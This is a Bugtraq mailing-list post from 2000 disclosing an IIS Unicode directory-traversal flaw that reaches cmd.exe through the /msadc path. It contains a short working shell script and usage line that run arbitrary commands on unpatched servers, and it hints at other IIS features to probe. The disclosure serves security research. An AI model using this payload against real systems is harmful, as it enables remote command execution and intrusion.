Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

%c1%1c NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!

From: Marco <m.v.berkum () obit nl>
Date: Fri, 20 Oct 2000 22:56:08 +0200
Hi,
A friend (Dimitri van de Giessen) called me after reading the article
regarding this remote execution UNICODE style bug in the IIS
webserver     (supposedly >4.0) found by a anonymous packetstorm mailer
and investigated by RFP.

Again NT??!?

Yes... again...
I called in another friend (Kristian Vlaardingerbroek) to eat a lot and
to help me find out this funny bug.
We started investigating and after a while we found that rain forest
puppy's string "%c1%af" worked on our english version of NT 4.0.
Playing a bit, feeling tired, we found that you CAN get out of the
document_root_drive to execute cmd.exe.

Remember the msadc RDS "feature" ?

Ok, so why not use /msadc ? Its a directory placed on the system drive
and usually accessible through normal HTTP requests.
Knowing this you would know that putting the website on a different
drive than your systemdrive would not make a difference at all ;)_
You can put it on and Q:\> if you like, you're still possibly
vulnerable.
Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
lynx -dump
http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7

--------------
./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double
backslash to escape it.

And voila, a dir listing.
It seems that every different language version of NT has different
UNICODE chars, didnt find out other countries yet, will be easy to make
in perl as RFP described (not going to give you source code either ;-)).

Most probably sample files like pagevieuw and codebrws.asp, other iis
samples and other "features"  like msadc, webhits, newdsn and +.htr
(%2B) get interesting AGAIN when placed on other dirs vieuwable by the
dir c:\\anything command. Get blisters patching your NT.

Now you can execute commands, welcome to amazing wold of Microsoft(TM).

Cheers,
Marco van Berkum, Dimitri van de Giessen, Kristian Vlaardingerbroek.

Marco    - www.obit.nl (marco () obit nl) http://www.britney.com
Dimitri   - www.IS-Watch.nl (info () IS-Watch nl)
http://www.is-watch.nl/microsoft.jpg ;)
Kristian -  www.obit.nl (kris () obit nl) http://www.slashdot.org
Previous By Date Next
Previous By Thread Next

Current thread: